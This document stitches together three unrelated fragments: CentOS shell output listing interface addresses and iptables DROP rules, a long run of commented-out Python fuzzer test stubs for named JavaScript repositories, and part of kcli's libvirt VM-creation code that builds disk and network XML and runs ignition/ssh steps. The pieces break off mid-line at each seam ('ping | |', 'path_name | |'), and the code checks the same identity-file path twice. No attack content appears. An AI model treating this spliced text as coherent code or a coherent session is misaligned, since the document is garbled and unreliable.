link/ether 00:0c:29:33:b4:1a brd ff:ff:ff:ff:ff:ff
inet 10.0.0.17/24 brd 10.0.0.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet 192.168.200.16/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.17/32 scope global eth0
valid_lft forever preferred_lft forever
inet 192.168.200.18/32 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::20c:29ff:fe33:b41a/64 scope link
valid_lft forever preferred_lft forever
[root@centos7 ~]#iptables -vnL
Chain INPUT (policy ACCEPT 59 packets, 3372 bytes)
pkts bytes target prot opt in out source destination
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.16
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.17
0 0 DROP all -- * * 0.0.0.0/0 192.168.200.18
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
Chain OUTPUT (policy ACCEPT 33 packets, 6940 bytes)
pkts bytes target prot opt in out source destination
[root@centos7 ~]#ping | |
'repos', 'Marketing-for-Engineers')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_MegEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'MegEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Memeye():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Memeye')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_MeteorRider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'MeteorRider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Mock():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Mock')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Modern_JavaScript_Curriculum():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Modern-JavaScript-Curriculum')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Modernizr():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Modernizr')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Monorail_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Monorail.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Motrix():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Motrix')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NG6_todomvc_starter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NG6-todomvc-starter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NativeBase():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NativeBase')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_New_Media_Image_Uploader():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'New-Media-Image-Uploader')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_NiL_JS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'NiL.JS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Numeral_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Numeral-js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OS_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OS.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Object_observe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Object.observe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Octosplit():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Octosplit')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OfflineMbTiles():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OfflineMbTiles')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Oimo_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Oimo.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Openframe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Openframe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_OverReact():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'OverReact')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PHP_Vars_To_Js_Transformer():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PHP-Vars-To-Js-Transformer')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PNGDrive():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PNGDrive')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Parse_SDK_JS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Parse-SDK-JS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PexJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PexJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhantomXHR():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhantomXHR')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhoneNumber_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhoneNumber.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Phonegap_SQLitePlugin():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Phonegap-SQLitePlugin')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhotoSwipe():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhotoSwipe')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PhysicsJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PhysicsJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PixelJihad():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PixelJihad')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PowerBI_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PowerBI-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PptxGenJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PptxGenJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Presenteer_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Presenteer.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PreventSpider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PreventSpider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Programing_In_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Programing-In-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Proton():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Proton')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PubSubJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PubSubJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Pumpkin():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Pumpkin')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Pure_JavaScript_HTML5_Parser():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Pure-JavaScript-HTML5-Parser')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_PureSlider():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'PureSlider')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Push_It():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Push-It')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_QuickJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'QuickJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_QuoJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'QuoJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RCSS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RCSS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RN_NavigationExperimental_Redux_Example():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RN-NavigationExperimental-Redux-Example')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ROMManagerManifest():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ROMManagerManifest')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Radio():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Radio')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RazorEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RazorEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Reasons_Craft():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Reasons-Craft')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ReplayLastGoal():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ReplayLastGoal')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RequireJS_Backbone_Starter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RequireJS-Backbone-Starter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Revenant():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Revenant')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Rocket_Chat():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Rocket.Chat')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Rucksack():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Rucksack')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_RxJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'RxJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SJSJ():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SJSJ')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScriptCommunicator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScriptCommunicator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScriptCraft():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScriptCraft')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ScrollMagic():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ScrollMagic')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Scrolld_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Scrolld.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Scroller():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Scroller')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SeetaFaceEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SeetaFaceEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Selecter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Selecter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Semantic_UI():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Semantic-UI')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SendBird_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SendBird-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Serious_Engine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Serious-Engine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SilkJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SilkJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sketch_Layer_Tools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sketch-Layer-Tools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchGit():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchGit')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchSquares():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchSquares')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SketchToSwift():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SketchToSwift')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SlickGrid():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SlickGrid')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Snake_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Snake-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Snap_svg():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Snap.svg')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SocialFeed_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SocialFeed.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sortable():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sortable')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SpaceEngineers():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SpaceEngineers')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sparky_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sparky.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SpeechToText_WebSockets_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SpeechToText-WebSockets-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sprint_Challenge__JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sprint-Challenge--JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Sprint_Challenge_Applied_Javascript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Sprint-Challenge-Applied-Javascript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Starling_Framework():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Starling-Framework')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_StatusPage():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'StatusPage')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Stockfish():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Stockfish')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Streamus():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Streamus')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Strelki_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Strelki.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SublimeRubyMotionBuilder():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SublimeRubyMotionBuilder')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_SublimeTextSetupWiki():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'SublimeTextSetupWiki')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Switcheroo():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Switcheroo')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Syte2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Syte2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TOMODOkorz():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TOMODOkorz')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TableTools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TableTools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangle():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangle')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram_base():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram-base')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram_component():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram-component')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tangram2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tangram2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tasks():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tasks')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TemplateBinding():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TemplateBinding')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_The_complete_guide_to_modern_JavaScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'The-complete-guide-to-modern-JavaScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TheAmazingAudioEngine():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TheAmazingAudioEngine')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ThreeNodes_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ThreeNodes.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Throttle():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Throttle')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TiIconicFont():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TiIconicFont')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TimelineJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TimelineJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Titanium_Tools():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Titanium-Tools')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Todo():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Todo')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TopLevel():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TopLevel')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TouchyBP():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TouchyBP')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tracker():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tracker')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TransformJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TransformJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Tuiter():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Tuiter')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_TypeScript():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'TypeScript')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UIWebView_TS_JavaScriptContext():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UIWebView-TS_JavaScriptContext')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_URI_js():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'URI.js')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UTiL():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UTiL')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UglifyJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UglifyJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UglifyJS2():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UglifyJS2')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_UnrealEnginePython():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'UnrealEnginePython')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_V2EX_Vue():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'V2EX-Vue')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_V8():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'V8')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Validator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Validator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Vanilla_JavaScript_Calculator():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Vanilla-JavaScript-Calculator')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_ViewerJS():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'ViewerJS')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_VvvebJs():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'VvvebJs')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WKWebViewJavascriptBridge():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'WKWebViewJavascriptBridge')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_Walkable_App():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'Walkable-App')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WalletGenerator_net():
# path_name = os.path.join(constants.seeds_dir, 'repos', 'WalletGenerator.net')
# multicall.multicall_directories(path_name, fuzzer='quickfuzz', validator=validate)
# def test_repos_WasAPlayer():
# path_name | |
self.disk_exists(pool, storagename):
if diskpool in volsxml:
volsxml[diskpool].append(volxml)
else:
volsxml[diskpool] = [volxml]
else:
common.pprint("Using existing disk %s..." % storagename, color='blue')
if index == 0 and diskmacosx:
macosx = True
machine = 'pc-q35-2.11'
if diskwwn is not None and diskbus == 'ide':
diskwwn = '0x%016x' % diskwwn
diskwwn = "<wwn>%s</wwn>" % diskwwn
else:
diskwwn = ''
dtype = 'block' if '/dev' in diskpath else 'file'
dsource = 'dev' if '/dev' in diskpath else 'file'
if diskpooltype in ['logical', 'zfs'] and (backing is None or backing.startswith('/dev')):
diskformat = 'raw'
disksxml = """%s<disk type='%s' device='disk'>
<driver name='qemu' type='%s'/>
<source %s='%s'/>
%s
<target dev='%s' bus='%s'/>
%s
</disk>""" % (disksxml, dtype, diskformat, dsource, diskpath, backingxml, diskdev, diskbus,
diskwwn)
netxml = ''
alias = []
guestagent = False
for index, net in enumerate(nets):
if usermode:
continue
ovs = False
macxml = ''
nettype = 'virtio'
if isinstance(net, str):
netname = net
nets[index] = {'name': netname}
elif isinstance(net, dict) and 'name' in net:
netname = net['name']
if 'mac' in nets[index]:
mac = nets[index]['mac']
macxml = "<mac address='%s'/>" % mac
if 'type' in nets[index]:
nettype = nets[index]['type']
if index == 0 and 'alias' in nets[index] and isinstance(nets[index]['alias'], list):
reservedns = True
alias = nets[index]['alias']
if 'ovs' in nets[index] and nets[index]['ovs']:
ovs = True
if 'ip' in nets[index] and index == 0:
metadata = """%s<kvirt:ip >%s</kvirt:ip>""" % (metadata, nets[index]['ip'])
if ips and len(ips) > index and ips[index] is not None and\
netmasks and len(netmasks) > index and netmasks[index] is not None and gateway is not None:
nets[index]['ip'] = ips[index]
nets[index]['netmask'] = netmasks[index]
if netname in bridges or ovs:
iftype = 'bridge'
sourcexml = "<source bridge='%s'/>" % netname
guestagent = True
if reservedns:
dnscmdhost = dns if dns is not None else self.host
dnscmd = "sed -i 's/nameserver .*/nameserver %s/' /etc/resolv.conf" % dnscmdhost
cmds = cmds[:index] + [dnscmd] + cmds[index:]
elif netname in networks:
iftype = 'network'
sourcexml = "<source network='%s'/>" % netname
else:
return {'result': 'failure', 'reason': "Invalid network %s" % netname}
ovsxml = "<virtualport type='openvswitch'/>" if ovs else ''
netxml = """%s
<interface type='%s'>
%s
%s
%s
<model type='%s'/>
</interface>""" % (netxml, iftype, macxml, sourcexml, ovsxml, nettype)
metadata = """%s
<kvirt:plan>%s</kvirt:plan>
</kvirt:info>
</metadata>""" % (metadata, plan)
if guestagent:
gcmds = []
if image is not None:
lower = image.lower()
if (lower.startswith('centos') or lower.startswith('fedora') or lower.startswith('rhel')):
gcmds.append('yum -y install qemu-guest-agent')
gcmds.append('systemctl enable qemu-guest-agent')
gcmds.append('systemctl restart qemu-guest-agent')
elif image.lower().startswith('debian'):
gcmds.append('apt-get -f install qemu-guest-agent')
elif [x for x in ubuntus if x in image.lower()]:
gcmds.append('apt-get update')
gcmds.append('apt-get -f install qemu-guest-agent')
index = 1
if image is not None and image.startswith('rhel'):
subindex = [i for i, value in enumerate(cmds) if value.startswith('subscription-manager')]
if subindex:
index = subindex.pop() + 1
cmds = cmds[:index] + gcmds + cmds[index:]
isoxml = ''
if iso is not None:
if os.path.isabs(iso):
if self.protocol == 'ssh' and self.host not in ['localhost', '127.0.0.1']:
isocheckcmd = 'ssh %s -p %s %s@%s "ls %s >/dev/null 2>&1"' % (self.identitycommand, self.port,
self.user, self.host, iso)
code = os.system(isocheckcmd)
if code != 0:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
elif not os.path.exists(iso):
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
if iso not in volumes:
return {'result': 'failure', 'reason': "Iso %s not found" % iso}
else:
isovolume = volumes[iso]['object']
iso = isovolume.path()
isoxml = """<disk type='file' device='cdrom'>
<driver name='qemu' type='raw'/>
<source file='%s'/>
<target dev='hdc' bus='ide'/>
<readonly/>
</disk>""" % iso
if cloudinit:
if image is not None and ('coreos' in image or image.startswith('rhcos')):
localhosts = ['localhost', '127.0.0.1']
ignition = True
ignitiondir = '/var/tmp'
k8sdir = '/var/run/secrets/kubernetes.io'
if os.path.exists("/i_am_a_container") and not os.path.exists(k8sdir):
ignitiondir = '/ignitiondir'
if not os.path.exists(ignitiondir):
msg = "You need to add -v /var/tmp:/ignitiondir to container alias"
return {'result': 'failure', 'reason': msg}
elif self.protocol == 'ssh' and self.host not in localhosts:
ignitiondir = '/tmp'
version = '3.0.0' if image.startswith('fedora-coreos') else '2.2.0'
ignitiondata = common.ignition(name=name, keys=keys, cmds=cmds, nets=nets, gateway=gateway, dns=dns,
domain=domain, reserveip=reserveip, files=files,
enableroot=enableroot, overrides=overrides, version=version, plan=plan)
with open('%s/%s.ign' % (ignitiondir, name), 'w') as ignitionfile:
ignitionfile.write(ignitiondata)
identityfile = None
if os.path.exists(os.path.expanduser("~/.kcli/id_rsa")):
identityfile = os.path.expanduser("~/.kcli/id_rsa")
elif os.path.exists(os.path.expanduser("~/.kcli/id_rsa")):
identityfile = os.path.expanduser("~/.kcli/id_rsa")
if identityfile is not None:
identitycommand = "-i %s" % identityfile
else:
identitycommand = ""
if self.protocol == 'ssh' and self.host not in localhosts:
ignitioncmd1 = 'scp %s -qP %s %s/%s.ign %s@%s:/var/tmp' % (identitycommand, self.port, ignitiondir,
name, self.user, self.host)
code = os.system(ignitioncmd1)
if code != 0:
return {'result': 'failure', 'reason': "Unable to create ignition data file in /var/tmp"}
elif image is not None and not ignition:
cloudinitiso = "%s/%s.ISO" % (default_poolpath, name)
dtype = 'block' if '/dev' in diskpath else 'file'
dsource = 'dev' if '/dev' in diskpath else 'file'
isoxml = """%s<disk type='%s' device='cdrom'>
<driver name='qemu' type='raw'/>
<source %s='%s'/>
<target dev='hdd' bus='ide'/>
<readonly/>
</disk>""" % (isoxml, dtype, dsource, cloudinitiso)
